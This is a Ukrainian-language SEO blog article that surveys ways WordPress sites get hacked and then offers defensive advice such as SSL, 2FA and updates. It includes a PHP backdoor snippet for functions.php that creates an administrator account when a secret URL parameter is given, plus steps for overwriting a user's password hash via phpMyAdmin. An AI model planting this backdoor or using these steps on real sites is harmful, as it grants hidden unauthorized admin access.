• WordPress

Як зламати WordPress?

  • Felix Rose-Collins
  • 8 min read
Як зламати WordPress?

Вступ

Перш ніж розпочати цю статтю, ми хотіли б нагадати, що хакерство є незаконним, і ми не мотивуємо і не заохочуємо будь-які зловмисні дії. Ця стаття призначена виключно для отримання знань про те, як працюють шахраї і наскільки різноманітні методи захисту сайтів необхідні для того, щоб тримати їх на відстані. Давайте подискутуємо:

  • Як шахраї зламують WordPress?
  • Як убезпечити свій сайт на WP від шахраїв?

Тож, без зайвих слів, перейдемо до теми.

Як зламати сайт WordPress онлайн?

How to Hack WordPress Website Online (Джерело: wpsecurityninja.com)

За допомогою WPScan:

WPScan - це сканер безпеки WP, який допомагає власникам сайтів перевіряти свої сайти на наявність вразливостей, але цей сканер також використовується хакерами для реалізації своїх мотивів для злому веб-сайтів.

WPScan дозволяє власникам та адміністраторам сайтів вказувати облікові записи користувачів WP та паролі до них і є першим кроком на шляху до отримання несанкціонованого доступу до облікових записів WP.

Brute force username and password using WPScan (Перебір імені користувача та пароля за допомогою WPScan. Джерело: Medium)

Атаки МІМ:

Атаки типу "людина посередині" (MIM) можуть бути легко здійснені у випадку, якщо користувачі використовують подібні локальні мережі. Незашифровані логіни користувачів є легкою мішенню, оскільки всі дані видно у відкритому тексті.

Програмне забезпечення, яке використовується для проведення таких атак, може виявляти скомпрометовані теми, плагіни та перераховувати користувачів.

MIM Attacks (Джерело: Medium)

SQL-ін'єкції:

SQL-ін'єкції вважаються найбільш відомими атаками, що використовуються для проникнення на веб-сайти. Ці атаки спрямовані на внутрішні шлюзи веб-сайтів і дозволяють хакерам проникнути в них шляхом виконання скомпрометованих команд.

SQL Injections (Джерело: secure.wphackedhelp.com)

Зустрічайте Ranktracker

Універсальна платформа для ефективного SEO

За кожним успішним бізнесом стоїть потужна SEO-кампанія. Але з незліченною кількістю інструментів і методів оптимізації на вибір може бути важко зрозуміти, з чого почати. Що ж, не бійтеся, адже у мене є те, що вам допоможе. Представляємо вам універсальну платформу Ranktracker для ефективного SEO

Ми нарешті зробили реєстрацію на Ranktracker абсолютно безкоштовною!

Створіть безкоштовний обліковий запис

Або Увійдіть, використовуючи свої облікові дані

Ці проникнення також дозволяють хакерам модифікувати бази даних і команди, видаляти або викрадати інформацію з сайтів.

Оскільки ці SQL-атаки виявляють вразливі та незаплановані сайти, вони роблять завдання злому легким та успішним.

Використання My SQL/cPanel:

У цьому методі хакери створюють фейковий обліковий запис або змінюють пароль поточного користувача сайту WP. Хакери намагаються проникнути через cPanel, відкривши PhpMyAdmin. Вони шукають таблицю, що закінчується на _users і знаходять користувача, якого хочуть змінити.

Це дозволить їм змінити облікові дані користувача, якого вони планують зламати. Вони відстежують користувача та змінюють його пароль (з поля user_pass), відкриваючи онлайн генератор MD5, і замінюють його на потрібний їм, а потім натискають на кнопку #.

Utilizing My SQL/cPanel (Імена користувачів, хешовані паролі користувачів, їхні електронні адреси тощо зберігаються в таблиці бази даних wp_users. Джерело: firstsiteguide.com)

Імена користувачів, хешовані паролі користувачів, їхні електронні адреси тощо зберігаються в таблиці бази даних wp_users.

Редагування функцій.php:

Хакери також отримують доступ до cPanel для модифікації файлу Functions.php. Розблокувавши диспетчер файлів, вони шукають папку активної теми. З папки public_html/wp_content/themes вони відстежують тему та редагують файл functions.php, розміщуючи в ньому свій скомпрометований код. Злом вже в процесі, оскільки хакери створили новий обліковий запис. Після цього вони видаляють скомпрометований код.

Створіть новий обліковий запис користувача через FTP:

Як правило, FTP-акаунти допомагають власникам сайтів створювати каталог на своєму сайті, який дозволяє певним користувачам завантажувати/вивантажувати свої файли, використовуючи свої облікові дані для входу в систему.

Ці файли також доступні для перегляду в мережі Інтернет.

Кроки по створенню облікового запису FTP на сайті:

  • Введіть необхідні дані
  • Введіть ім'я нового користувача FTP
  • Введіть пароль для виділення облікового запису для доступу по FTP
  • Введіть ім'я каталогу для надання доступу по FTP
  • Вкажіть бажаний обсяг пам'яті в мегабайтах, який ви бажаєте виділити для цієї папки
  • Після цього натисніть кнопку "Створити" для створення нового облікового запису.

Для отримання доступу через FTP новий користувач повинен завантажити зазначені нижче дані.


Адреса / Host Name / Адреса: yourdomain.com або ftp.yourdomain.com Користувач / User: user@yourdomain.com Пароль: El пароль, призначений для цього FTP-акаунта

Порт: 21Назвіть папку для завантаження/вивантаження файлів.


Новий користувач буде мати права на читання і запис як на обраний каталог, так і на всі підкаталоги, що містяться в ньому. Наприклад, якщо створити користувача-клієнта і дати йому доступ до каталогу / home / user / public_html

Проникнення через чорний хід:

Зловмисний спосіб проникнення на сайт - це вхід через чорний хід. Будь то шахрай, який хоче отримати доступ до вашого сайту, або користувач-жертва, який хоче відновити доступ до свого сайту через бекдор, їм обом необхідно виконати наведені нижче кроки.

Зустрічайте Ranktracker

Універсальна платформа для ефективного SEO

За кожним успішним бізнесом стоїть потужна SEO-кампанія. Але з незліченною кількістю інструментів і методів оптимізації на вибір може бути важко зрозуміти, з чого почати. Що ж, не бійтеся, адже у мене є те, що вам допоможе. Представляємо вам універсальну платформу Ranktracker для ефективного SEO

Ми нарешті зробили реєстрацію на Ranktracker абсолютно безкоштовною!

Створіть безкоштовний обліковий запис

Або Увійдіть, використовуючи свої облікові дані

У випадках, коли новий обліковий запис користувача створюється через FTP або здійснюється скидання паролю, але це не дає бажаного результату, користувач може захотіти зламати свій сайт через бекдор і отримати доступ до адміністрування.

Кроки для створення бекдору:

  • Відкрийте файл functions.php та вставте в нього наведений нижче код.
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
If ($_GET['backdoor'] == 'knockknock') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>
  • Пізніше збережіть зміни.

Криптоджекінг та майнінг криптовалют:

Популярність криптовалют призвела до появи нових кіберзагроз, таких як криптоджекінг, який також називають шкідливим програмним забезпеченням для майнінгу криптовалют.

Акт вилучення комп'ютера всупереч бажанню та обізнаності користувача називається криптоджекінгом (англ. crypto-jacking). При криптоджекінгу шахраї заражають комп'ютер користувача шкідливим програмним забезпеченням, яке доставляється через програмне забезпечення для компрометації систем і мереж.

Фішинг:

Фішинг - це метод, за допомогою якого шахраї виманюють у користувачів їхню конфіденційну інформацію (дані для входу в систему, номер соціального рахунку, PIN-код, дані кредитної картки тощо), видаючи себе за юридичну особу. Зазвичай вони вдаються до електронних листів для досягнення своєї мети.

Приклад: Шахрай може видавати себе за надійне джерело і збирати персональні дані користувачів для виконання їхніх бажань. Він також може вставити в фішинговий лист непрацююче посилання і перенаправити користувача на якийсь шахрайський сайт для доставки шкідливого програмного забезпечення.

Шкідливе програмне забезпечення:

Статистика безпеки WordPress показує, що 4000 веб-сайтів WP заражені шкідливим програмним забезпеченням через підроблені SEO-плагіни.

Шахраям не потрібне джерело для розповсюдження шкідливого програмного забезпечення. SEO-плагіни, WP-теми та багато інших факторів, присутніх на сайті, мотивували хакерів використовувати нещодавнє шкідливе програмне забезпечення WP-VCD.

Навіть фішингові електронні листи є шлюзами для доставки шкідливого програмного забезпечення.

І тут девіз хакерів той самий - отримати конфіденційні дані користувачів шляхом проникнення в системи та викрадення інформації.

WordPress Ransomware:

У вірусах-вимагачах WP хакери використовують шкідливе програмне забезпечення для блокування доступу користувачів до систем та мереж. Відновити його користувач може, сплативши викуп, як того вимагає хакер.

Приклад: Атака Petya, при якій хакер шифрує ваші файли та дані і вимагає викуп за ключ розшифровки.

Cross-Site Scripting (XSS) атака:

XSS-атаки здійснюються хакерами шляхом впровадження шкідливого контенту на веб-сайт, використовуючи таким чином браузер. Така атака дозволяє хакеру викрадати дані з файлів cookie, змінювати вміст сайту, а також захоплювати сайт для отримання конфіденційних даних.

Клікджекінг:

При клікджекінгу хакер робить зловмисну спробу скомпрометувати кнопку/посилання та мотивує користувача натиснути на скомпрометований об'єкт. Це дозволяє хакеру виконати зловмисні команди для отримання доступу до конфіденційних даних користувача.

Підробка:

Спуфінг - це атака, під час якої особа маскується під достовірну особу з метою отримання незаконної вигоди від користувача та обманом змушує його надати свою конфіденційну інформацію.

Щоб запобігти всім цим хакерським атакам, необхідно вжити спеціальних заходів безпеки для захисту вашого веб-сайту WP.

Як захистити сайт на WordPress від злому?

How to Secure WordPress Website from Hacking? (Джерело: envisagedigital.co.uk)

Наведених вище статистичних даних достатньо для того, щоб говорити про популярність WordPress. Саме ця популярність робить дану CMS-платформу більш бажаною серед хакерів, які застосовують різноманітні методи злому для отримання доступу до WP-сайтів та їх даних.

Тому важливо знати, як запобігти доступу хакерів до вашого сайту на WP.

Захистіть свій сайт на WP за допомогою SSL-сертифіката:

Коли будь-які дані завантажуються на сайт, вони завжди подаються у вигляді відкритого тексту, який легко доступний для всіх, включаючи хакерів. Це може бути ризиковано, оскільки хакери можуть зловживати даними вашого сайту.

Сертифікати SSL (Secure Socket Layers ) - це цифрові сертифікати, які допомагають захистити ваш сайт WP за допомогою 256-бітного шифрування, перетворюючи дані вашого сайту в закодований формат.

Хакери не можуть прочитати коди, навіть якщо вони отримали доступ до вашого сайту, і тому вони змушені залишати такі сайти.

Secure your WP site with SSL Certificate (Джерело: clickssl.net)

Виберіть бажану марку SSL-сертифіката (Comodo, Thawte, RapidSSL і т.д.) і встановіть його на свій сайт на WP. У випадку з типом SSL-сертифіката потрібно розбиратися в доменах і піддоменах. Наприклад, якщо ваш сайт WP має піддомени, тоді один дешевий сертифікат Wildcard, який коштує приблизно 45 доларів на рік, може захистити весь ваш цифровий бізнес.

Швидка видача, 2048-бітове шифрування ключа, підвищення SEO, печатка довіри сайту, 99% сумісність з браузерами і мобільними пристроями, політика повернення коштів і гарантія - ось деякі з особливостей і переваг установки Wildcard SSL-сертифікатів.

Різноманітні бренди та варіанти SSL-продуктів, бюджетні ціни та відмінне обслуговування клієнтів - це лише деякі з переваг звернення до магазину ClickSSL для захисту вашого сайту на WP.

Оновіть своїх співробітників:

Людські помилки можуть мати катастрофічні наслідки, тому завжди слідкуйте за тим, щоб ваші співробітники були в курсі останніх кіберзагроз, щоб уникнути їх вразливості.

Якщо ваші співробітники зможуть відстежити підозрілі сигнали зламаного сайту на початковій стадії, вони зможуть повідомити про це зацікавленим особам і запобігти подальшому нанесенню шкоди вашому сайту та бізнесу.

Використовуйте двофакторну автентифікацію (2FA):

Впровадження 2FA під час входу на сайт є найбільш ефективним способом захисту від атак грубої сили. Крім того, що вони додають ще один рівень безпеки, вони також запобігають крадіжці даних сайту і користувачів.

Це пов'язано з тим, що якщо один рівень безпеки скомпрометований, шахрай повинен проникнути на 2-й рівень, щоб отримати доступ до веб-сайту.

Це складне завдання, і тому в більшості випадків шахраї переходять на інші, менш захищені сайти.

Порада: WP 2FA - це безкоштовний плагін WP, який надає додатковий рівень безпеки вашому сайту WP.

Регулярно перевіряти користувачів адміністратора:

Це важливо для безпеки вашого сайту на WP. Переконайтеся, що ви регулярно проводите аудит своїх користувачів-адміністраторів та перехресну перевірку їхніх доступів.

Також переконайтеся, що ваші користувачі, а також співробітники мають обмежений доступ відповідно до їхніх завдань, щоб запобігти прогалинам у безпеці.

Регулярно оновлюйте ядро WordPress:

Не знаєте про WP Core?

Дозвольте мені коротко пояснити, що WP Core включає в себе всі основні фундаментальні файли, необхідні для роботи WP.

Лістинг файлів в архіві WP zip, завантаженому з WordPress.org

Update WordPress Core Regularly (Джерело: ithemes.com)

Ці основні файли повинні регулярно оновлюватися після випуску оновлень безпеки для усунення всіх вразливостей безпеки.

Завантажуйте теми та плагіни WP з надійних джерел:

Це дуже важливо, оскільки плагіни можуть бути загрозливими, якщо вони не оновлюються або встановлюються з ненадійних джерел. У разі використання безкоштовних/платних плагінів завжди перевіряйте наведені нижче фактори, такі як:

  • Оцінки та відгуки користувачів
  • Зручність для користувача
  • Сумісність
  • Безпека
  • Надійність

Download WP Themes & Plugins from Trustworthy Sources (Джерело: torquemag.io)

Це ж правило стосується і встановлення тем WP.

Регулярно оновлюйте теми та плагіни WP:

Застарілі або з простроченим терміном дії теми та плагіни для WP завжди становлять загрозу для вашого WP-сайту, оскільки вони програють у стандартах безпеки. Щоб хакери не могли використовувати такі шлюзи для розповсюдження шкідливого програмного забезпечення з метою отримання доступу до сайту, регулярно оновлюйте теми та плагіни, що використовуються на вашому WP-сайті.

Це допоможе плагіну правильно функціонувати і синхронізуватися з останніми версіями WP.

Порада: На сторінці плагінів ви можете переглянути всі встановлені плагіни та посилання "Увімкнути автоматичне оновлення" біля кожного плагіна. Увімкніть його для автоматичного оновлення.

Змінити ім'я адміністратора за замовчуванням:

Хакери дуже розумні, і вони можуть легко проникнути на ваш сайт WP, використовуючи ім'я адміністратора за замовчуванням. Завжди бажано змінювати ім'я користувача за замовчуванням, щоб не дати хакерам виконати атаку грубої сили для отримання несанкціонованого доступу до вашого веб-сайту.

Обмежений доступ:

Ніколи не давайте більше, ніж необхідно, і це ж правило застосовується до надання доступу до сайту як користувачам, так і співробітникам.

Контроль доступу є найголовнішим правилом безпеки сайту та даних, оскільки він визначає, хто може або не може отримати доступ до сайту. Заблокуйте всі входи до адмінки WP та інших критично важливих кодів і даних для безпеки сайту.

Обмежений доступ не тільки підвищує продуктивність, але й захищає ваш сайт від зловмисних записів.

Оновлення WordPress:

Коли ваш WordPress не оновлюється, ваш сайт піддається ризику вторгнення хакерів.

WordPress займає 37% ринку, і він продовжує регулярно випускати оновлення для усунення дірок у безпеці та помилок. Ці оновлення також включають нові функції та вдосконалення існуючих, які корисні для підвищення продуктивності вашого сайту.

Зустрічайте Ranktracker

Універсальна платформа для ефективного SEO

За кожним успішним бізнесом стоїть потужна SEO-кампанія. Але з незліченною кількістю інструментів і методів оптимізації на вибір може бути важко зрозуміти, з чого почати. Що ж, не бійтеся, адже у мене є те, що вам допоможе. Представляємо вам універсальну платформу Ranktracker для ефективного SEO

Ми нарешті зробили реєстрацію на Ranktracker абсолютно безкоштовною!

Створіть безкоштовний обліковий запис

Або Увійдіть, використовуючи свої облікові дані

Why you should always update your wordpress (Джерело: wpbeginner.com)

Оновлюйте свій сайт на WP для забезпечення надійної безпеки.

Закінчуємо:

Використовуйте надійні та складні паролі та постійно оновлюйте свій сайт на WP, а також плагіни та теми, щоб виправити всі прогалини в системі безпеки. Приділіть час навчанню своїх співробітників, оскільки це завжди допоможе запобігти катастрофам.

Ніколи не нехтуйте безпекою і завжди використовуйте найкращі та надійні плагіни безпеки, щоб захистити свій сайт на WP від сторонніх очей. Крім того, захистіть свій сайт за допомогою SSL, щоб підвищити довіру клієнтів, бізнес та SEO.

Тепер, коли ви знаєте, як працюють хакери, ми сподіваємося, що ця стаття допоможе вам запобігти проникненню хакерів на ваш сайт і безпечно керувати вашим сайтом на WP.

Felix Rose-Collins

Felix Rose-Collins

Ranktracker's CEO/CMO & Co-founder

Felix Rose-Collins is the Co-founder and CEO/CMO of Ranktracker. With over 15 years of SEO experience, he has single-handedly scaled the Ranktracker site to over 500,000 monthly visits, with 390,000 of these stemming from organic searches each month.

Почніть користуватися Ranktracker... Безкоштовно!

Дізнайтеся, що стримує ваш сайт від ранжування.

Створіть безкоштовний обліковий запис

Або Увійдіть, використовуючи свої облікові дані

Different views of Ranktracker app